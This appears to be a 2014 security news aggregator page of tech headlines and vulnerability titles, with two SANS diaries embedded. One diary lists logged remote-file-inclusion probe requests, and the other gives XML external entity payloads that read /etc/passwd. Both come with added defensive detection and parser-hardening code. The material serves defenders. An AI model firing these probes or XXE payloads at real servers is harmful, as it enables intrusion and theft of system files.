Hackin9
Tablets are getting bigger screens, moving into cars, and dual-booting Windows and Android at this year's International CES show as tech vendors give a glimpse into the gadget's future.
 
A deeper look by Cisco Systems into the cyberattack that infected Yahoo users with malware appears to show a link between the attack and a suspicious affiliate traffic-pushing scheme with roots in Ukraine.
 
Facebook is pulling the plug on a controversial advertising program that served ads to people based on the activity of their friends, such as "Likes" and check-ins.
 
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 

Want To Develop Information Security Skills? Capture The Flag
NetworkComputing.com
Among computer security professionals, there's a popular competition known as Capture the Flag (CTF). You'll often find them held at less conventional conferences such as Defcon, and at universities and infosec gatherings. Played in darkened rooms and ...

 


India's Poll Panel Declines Google Voting Services Offer Over Security Concerns
CIO
To register online as a voter on the commission website, people have to provide their email IDs and mobile phone numbers, said Jiten Jain, a member of Indian Infosec Consortium, a group of cybersecurity experts. By the tie-up with the commission ...
India's election regulator drops plan to partner Google after spying fears (WTAQ)
EC cries off Google tie-up (Calcutta Telegraph)

 
 
Deploying a process-improvement strategy can help your IT department be more productive and reduce errors. We talked to Six Sigma (and other) experts about why the move makes good business sense.
 
Ansible and AnsibleWorks AWX bring simplicity and power to Linux and Unix server automation
 
Snapchat has incorporated a phone number opt-out feature into its mobile app in response to a recent hacking incident -- the company's latest effort to convince users that their personal information is safe.
 
Dell on Thursday declined to confirm a report of employee layoffs, but said it could make decisions related to the workforce if necessary in order to maintain company stability.
 
Chris Boyle was surfing with friends in the Dominican Republic a few years ago when he came up with the idea for the Soloshot, a robotic camera that tracks your every move from about a mile away.
 
Vendors showed many wearable devices at the International CES expo, but the next big thing may just come from an enthusiast's garage.
 
About 2.5 million Chromebooks were sold globally in 2013, or about 1% of the entire PC market, according to IDC. But most of those sales were driven by consumers, not by enterprise users.
 

-- Bojan INFIGO IS

 
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scan. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising.
Judging by the source IP addresses, the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.
 
The scanning requests are relatively fast: in the capture Yinette made, the bot constantly sent at least 2 requests per second. All requests try to exploit an RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).
 
The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.
 
Some observed requests are shown below:
 
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
 
This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(er) botnet.

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!
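As an added example (not part of Bojan's diary), here is the detection logic a web server owner could run over an access log to pick out this kind of scanner: it flags any query parameter whose value is itself a remote URL, then aggregates per client IP so that one bot probing hundreds of different scripts stands out from a legitimate user. It assumes Apache combined log format; the sample lines below are constructed, use documentation IP ranges, and reuse request targets from the diary above. Because `parse_qsl` percent-decodes values, an encoded `http%3A%2F%2F` prefix is caught as well.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Any parameter value that starts with a URL scheme is a candidate remote include.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Apache combined log format (assumed): client IP first, request line in quotes.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample log: six probes from one source (targets taken from the
# diary above) and two ordinary requests from an unrelated client.
SAMPLE_LOG = """
198.51.100.7 - - [09/Jan/2014:10:00:00 +0000] "GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0" 404 209 "-" "-"
198.51.100.7 - - [09/Jan/2014:10:00:00 +0000] "GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0" 404 209 "-" "-"
198.51.100.7 - - [09/Jan/2014:10:00:01 +0000] "GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0" 404 209 "-" "-"
198.51.100.7 - - [09/Jan/2014:10:00:01 +0000] "GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0" 404 209 "-" "-"
198.51.100.7 - - [09/Jan/2014:10:00:02 +0000] "GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0" 404 209 "-" "-"
198.51.100.7 - - [09/Jan/2014:10:00:02 +0000] "GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0" 404 209 "-" "-"
203.0.113.5 - - [09/Jan/2014:10:00:03 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Jan/2014:10:00:04 +0000] "GET /login.php?redirect=/account HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
""".strip().splitlines()


def rfi_params(target):
    """Return (name, value) pairs in a request target whose value is a remote URL.

    The trailing '?' that follows the included URL in the observed requests is
    kept as part of the value, so the match reflects exactly what was sent.
    """
    query = urlsplit(target).query
    return [(name, value)
            for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(value)]


def scan_log(lines):
    """Aggregate per client IP: total requests, RFI probes, distinct scripts hit, remote URLs seen."""
    report = {}
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the whole scan
        stats = report.setdefault(m["ip"], {"requests": 0, "rfi_hits": 0,
                                            "scripts": set(), "remote_urls": set()})
        stats["requests"] += 1
        hits = rfi_params(m["target"])
        if hits:
            stats["rfi_hits"] += 1
            stats["scripts"].add(urlsplit(m["target"]).path)
            stats["remote_urls"].update(value for _, value in hits)
    return report


def flag_scanners(report, min_hits=5):
    """IPs that sent at least min_hits RFI probes against at least min_hits different scripts."""
    return sorted(ip for ip, s in report.items()
                  if s["rfi_hits"] >= min_hits and len(s["scripts"]) >= min_hits)


if __name__ == "__main__":
    result = scan_log(SAMPLE_LOG)
    for ip in flag_scanners(result):
        s = result[ip]
        print(ip, "probed", len(s["scripts"]), "scripts, including from:", sorted(s["remote_urls"]))
```

The distinct-scripts threshold is what separates a scanner from a single misconfigured client: a real user who hits one broken page repeatedly never accumulates many different target paths, whereas the bot in the diary touched 804 of them.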

--
Bojan
@bojanz
INFIGO IS

 
A screenshot of an Apache server log showing infected Macs connecting to a Flashback command and control server. The user agent strings and referrer strings showing Windows NT 6.1 machines are set by Flashback. Intego has confirmed that the machines are, in fact, infected Macs.
Intego

The Flashback trojan that hijacked well over 500,000 Macs at its peak is still clinging to life, with about 22,000 infected machines in recent days, a security researcher said.

The compromised Macs were observed connecting to command and control servers that had been "sinkholed"—meaning taken over for research or security purposes—by analysts from security firm Intego. During a five-day period ending January 7, 22,000 Flashback-infected computers reported to server domains recently acquired by Intego, Arnaud Abbati, a researcher with the company, wrote in a blog post. Those machines could be maliciously controlled by anyone who has access to one of the many domain names programmed into a Flashback algorithm, assuming they know how the internals of the malware work.

Flashback first came to light in 2011 when it took hold of people's machines by masquerading as a legitimate installer of Adobe's ubiquitous Flash media player. By early 2012, Flashback morphed from a socially engineered threat to one that performed surreptitious drive-by attacks by exploiting vulnerabilities in Oracle's Java software framework. Flashback was among the most sophisticated pieces of malware ever to target mainstream Mac users.


 

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 
Microsoft plans to deliver just four security updates next week, none of them marked "critical," to quash vulnerabilities in Windows, Word, SharePoint Server and Dynamics AX.
 
WordPress S3 Video Plugin 'base' Parameter Cross Site Scripting Vulnerability
 
Wallpaper Script 'name' Parameter HTML Injection Vulnerability
 
Wordpress Recommend To a Friend Plugin 'current_url' parameter Cross Site Scripting Vulnerability
 
Andy's PHP Knowledgebase Multiple Cross-Site Scripting Vulnerabilities
 
A security analysis of mobile banking apps for iOS devices from 60 financial institutions around the world has revealed that many were vulnerable to various attacks and exposed sensitive information.
 
Salesforce.com has spent plenty of time lately discussing its new Salesforce1 development platform, but most of its customers remain focused on the vendor's core CRM (customer relationship management) application, which has just received a significant new upgrade.
 
Intel has completed work on a 64-bit version of Android OS for x86 smartphones, and the software will be ready to load on handsets with its upcoming Atom 64-bit chip code-named Merrifield.
 
After three postponements, Orbital Sciences' Antares rocket lifted off today, carrying a cargo spacecraft filled with supplies for the International Space Station.
 
Microsoft CEO Steve Ballmer has watched $1.1 billion evaporate from the value of his company stock as the selection process for a successor has dragged on.
 
Puppet CVE-2013-4969 Symlink Attack Local Privilege Escalation Vulnerabilities
 

 
Samba 'pam_winbind' Configuration File Security Bypass Vulnerability
 
Along with the Wireless Power Consortium, the Alliance for Wireless Power has announced several of its members will be selling charging devices for furniture and cars.
 


India's election regulator drops plan to partner Google after spying fears
WTAQ
But the plan was opposed by the Indian Infosec Consortium, a government and private sector-backed alliance of cyber security experts, who feared Google would collaborate with "American agencies" for espionage purposes. The Election Commission did not ...
EC cries off Google tie-up (Calcutta Telegraph)

 
Cisco Context Directory Agent Remote Privilege Escalation Vulnerability
 
LinuxSecurity.com: An updated gnupg package that fixes one security issue is now available for Red Hat Enterprise Linux 5. The Red Hat Security Response Team has rated this update as having moderate [More...]
 
LinuxSecurity.com: Updated openssl packages that fix three security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having [More...]
 
Drupal Entity API Module Multiple Access Bypass Vulnerabilities
 
Restoring trust in our information systems after Edward Snowden's NSA revelations will take years -- if it can be done at all.
 

Secure Your Home Network with the January edition of the OUCH! Newsletter: http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-201401_en.pdf

 

CounterTack Unveils Next Generation Of Sentinel For Endpoint Threat
Dark Reading
"Defending against advanced persistent threats and protecting our organization and customers from threats like Dark Seoul are our top priorities," said Jae Woo Lee, General Manager of the Managed Security Service Team, SK Infosec. "We needed a platform ...

 
The International CES might never have seen so many connected devices in its history. Never mind phones and tablets, everything from cooking pots to cars and fitness bands now connect to the Internet and broadcast information.
 
The CEOs of Apple and Samsung Electronics will participate in mediation ahead of a March trial in a patent dispute in a federal court in California.
 
IBM continues to commercialize its Watson-branded cognitive computing technology, setting up a new Watson business unit and unveiling two new Watson-derived services.
 
Cisco Adaptive Security Appliance Authorization State Change Security Bypass Vulnerability
 

CounterTack Unveils Next Generation of Sentinel for Endpoint Threat Detection ...
4-traders (press release)
"Defending against advanced persistent threats and protecting our organization and customers from threats like Dark Seoul are our top priorities," said Jae Woo Lee, General Manager of the Managed Security Service Team, SK Infosec. "We needed a platform ...

 
The number of 3D printer vendors rose from five last year to more than 20 this year, and prices for their machines have come down dramatically.
 
The oft-used phrase 'Internet of Things' is one emerging tech jargon abstraction that average users are still noodling over in order to better understand and appreciate it.
 
Work Folders, new to Windows Server 2012 R2, helps administrators manage user-created data in a BYOD environment.
 
Singling out RSA for reproach for allegedly enabling a backdoor in one of its encryption technologies in a deal with the National Security Agency deflects attention from the role other technology vendors may have had in enabling NSA's secret data collection activities.
 
Cisco Context Directory Agent Hidden Input Security Vulnerability
 
If you are accustomed to cramming your expensive smartphone into your jeans pocket or alongside of sharp keys inside a purse, you should be glad to hear that Corning recently announced Gorilla Glass 3.
 
Many modern applications today use XML documents to transfer data between clients and servers. Due to its simplicity, XML is actually great for this and is therefore very often used for representation of various data structures.
 
Typically a rich web application will use XML to send data from the client to the server side. This XML document, which might contain various data structures related to the web application, is then processed on the server side. Here we can see a typical problem with untrusted input – since an attacker can control anything on the client side, he can impact the integrity of the XML document that is submitted to the server. Generally this should not be a problem unless the following happens.
 
Since the web application (on the server side) receives the XML document we just sent, it has to somehow parse it. Depending on the framework used on the server side, it is most often (especially for business applications) either a Java or a .NET application; other frameworks typically rely on libxml2.
 
The security problem here is in a special structure defined by the XML standard: the entity. Every entity has certain content and is normally used throughout the XML document. However, one specific entity type is particularly dangerous: external entities.
 
An external entity declaration further allows two types: SYSTEM and PUBLIC. The SYSTEM external entity is the one we are interested in – it allows one to specify a URI which will be dereferenced to replace the entity. One example of such an entity is shown below:
 
<!ENTITY ISCHandler
SYSTEM "https://isc.sans.edu/api/handler">
 
Now when parsing such an XML document, wherever we have the ISCHandler entity, the parser will replace it with the contents of the retrieved URI. Pretty bad already, isn’t it? But it gets even worse – by exploiting this we can include any local file by simply pointing to it:
 
<!ENTITY ISCHandler
SYSTEM "file:///etc/passwd">
 
Or on Windows
 
<!ENTITY ISCHandler
SYSTEM "file:///C:/boot.ini">
 
As long as our current process has privileges to read the requested file, the XML parser will simply retrieve it and insert it wherever it finds a reference to the ISCHandler entity (&ISCHandler;).
 
The impact of such a vulnerability is pretty obvious. A malicious attacker can actually do much more – just use your imagination:
  • We can probably DoS the application by reading from a file such as /dev/random or /dev/zero.
  • We can port scan internal IP addresses, or at least try to find internal web servers.
Obviously, probably the most dangerous “feature” is extraction of data – similarly to how we would pull data from a database with a SQL Injection vulnerability, we can read (almost) any file on the hard disk. This includes not only the password file but potentially more sensitive files such as DB connection parameters and what not. Depending on the framework, including a directory will even give us the directory’s listing, so we don’t have to blindly guess file names! Very nasty.

Everything so far is nothing new really; however, in the last X pentesting engagements, for some reason XXE vulnerabilities started popping up. So what is the reason for that? First of all, some libraries allow external entity definitions by default. In such cases, the developer himself has to explicitly disable inclusion of external entities. This is probably still valid for Java XML libraries, while with .NET 4.0 Microsoft changed the default behavior not to allow external entities (in .NET 3.5 they are allowed).
 
So, while XXE will not become as dangerous as SQLi (hey, the subject was there to get your attention), we do find them more often than before which means that we should raise awareness about such vulnerabilities.
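As an added example (not part of Bojan's diary), the following shows, from the parser's side, exactly where the decision described above is made and how a server should make it. It uses Python's built-in expat binding, which hands every external entity reference to a callback instead of fetching the URI itself; the callback below records the URI and declines, and a hardened wrapper rejects any document that carries a DOCTYPE at all, which is the equivalent of "disable external entities" for stacks where that is not the default. The two XML documents are constructed for this example and reuse the ISCHandler entity and the /etc/passwd URI from the diary; no file is ever read.

```python
import xml.parsers.expat

# Constructed samples: a benign order document and the same document with the
# external entity from the diary declared in an internal DTD subset.
BENIGN_SAMPLE = b'<?xml version="1.0"?><order><item>widget</item></order>'
XXE_SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY ISCHandler SYSTEM "file:///etc/passwd">
]>
<order><item>&ISCHandler;</item></order>"""


def audit_xml(data):
    """Parse XML with expat while refusing to dereference any external entity.

    Returns the DOCTYPE name (if any), every external entity declared, every
    external reference the parser asked us to resolve (all refused), and the
    character data that actually ended up in the document.
    """
    findings = {"doctype": None, "external_entities": [], "refused": [], "text": ""}
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = name

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        # value is None for external entities; sysid carries the SYSTEM URI.
        if value is None:
            findings["external_entities"].append((name, sysid))

    def on_external_ref(context, base, sysid, pubid):
        # This is the point where a permissive parser would open the URI
        # (file, http, /dev/random, ...). We log it and do not fetch anything;
        # returning 1 tells expat the reference was handled so parsing continues.
        findings["refused"].append(sysid)
        return 1

    def on_text(text):
        findings["text"] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.CharacterDataHandler = on_text
    parser.Parse(data, True)
    return findings


def reject_reason(data):
    """None when the document is acceptable for an untrusted source, else why it is dropped."""
    findings = audit_xml(data)
    if findings["doctype"] is not None:
        return "DOCTYPE present (name=%s, external entities declared=%d)" % (
            findings["doctype"], len(findings["external_entities"]))
    return None


def parse_untrusted(data):
    """Hardened entry point: no DOCTYPE means no entity declarations of any kind."""
    reason = reject_reason(data)
    if reason is not None:
        raise ValueError(reason)
    return audit_xml(data)["text"]


if __name__ == "__main__":
    print("benign ->", parse_untrusted(BENIGN_SAMPLE))
    print("audit of XXE sample ->", audit_xml(XXE_SAMPLE))
    print("reject reason ->", reject_reason(XXE_SAMPLE))
```

Refusing the DOCTYPE outright, rather than only the external references, is deliberate: it also closes the parameter-entity and entity-expansion variants of the same problem, and legitimate client-to-server payloads almost never need a DTD. Logging the refused URIs, as `audit_xml` does, gives the defender the indicator that an XXE probe is under way.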
 
--
Bojan
@bojanz
INFIGO IS
 

Posted by InfoSec News on Jan 09

http://www.thesmokinggun.com/documents/guccifer-archive-687543

The Smoking Gun
JANUARY 6, 2014

JANUARY 6 -- The hacking spree by "Guccifer," the online outlaw who has
bedeviled Colin Powell, members of the Bush and Rockefeller families,
Obama administration officials, and assorted other public figures, has
been far more extensive than previously known, The Smoking Gun has
learned.

A large cache of documents reveals that the...
 

Posted by InfoSec News on Jan 09

http://news.techworld.com/security/3496323/nvidia-takes-customer-site-offline-after-sap-bug-found/

By Jeremy Kirk
Techworld.com
09 January 2014

Graphics chipmaker Nvidia took a customer service website offline
Wednesday following a public report of a vulnerability in its SAP-powered
backend.

The affected website, https://nvcare.nvidia.com, uses SAP's NetWeaver,
which is a framework that underpins many SAP business applications. The...
 

Posted by InfoSec News on Jan 09

http://www.independent.ie/woman/lindsay-lohan-fears-nude-photo-leak-after-laptop-is-stolen-29899036.html

[Even money says LiLo's publicist 'forgot' to pack her laptop. -WK]

08 JANUARY 2014

Lindsay Lohan's missing computer reportedly has naked pictures of her on
it.

The actress claims her PC was stolen at the airport in Shanghai, China,
and tweeted she was offering a reward for anyone who could return it.

Now TMZ...
 

Posted by InfoSec News on Jan 09

http://www.wired.com/threatlevel/2014/01/teen-reported-security-hole/

By Kim Zetter
Threat Level
Wired.com
01.08.14

A teenager in Australia who thought he was doing a good deed by reporting
a security vulnerability in a government website was reported to the
police.

Joshua Rogers, a 16-year-old in the state of Victoria, found a basic
security hole that allowed him to access a database containing sensitive
information for about 600,000...
 

Posted by InfoSec News on Jan 09

http://www.nextgov.com/cybersecurity/2014/01/nist-paid-16500-space-now-boycotted-rsa-conference/76421/

By Aliya Sternstein
Nextgov.com
Jan. 8, 2014

The National Institute of Standards and Technology purchased a $16,500
booth at an RSA event that technologists are pulling out of in protest of
the encryption company’s alleged deal with the National Security Agency to
weaken products using a NIST-approved trapdoor.

NIST’s entire leadership...
 

Posted by InfoSec News on Jan 09

http://www.theregister.co.uk/2014/01/08/rsa_conference_boycott/

By John Leyden
The Register
8th January 2014

More security researchers are boycotting next month's US edition of the
RSA Conference in protest against an alleged "secret deal" the company is
said to have struck with the National Security Agency.

Last month Reuters reported that the NSA "secretly paid" RSA Security $10m
in return for making the...
 

Posted by InfoSec News on Jan 09

http://healthitsecurity.com/2014/01/06/omnicell-data-breach-suit-dismissal-healthcare-ramifications/

By Patrick Ouellette
healthitsecurity.com
January 6, 2014

A lawsuit against Omnicell stemming from a 2012 health data breach was
recently dismissed, in part, because the plaintiff failed to prove damages
related to the breach. The interesting part of the dismissal, however, was
that there were four separate defendants that were involved that...
 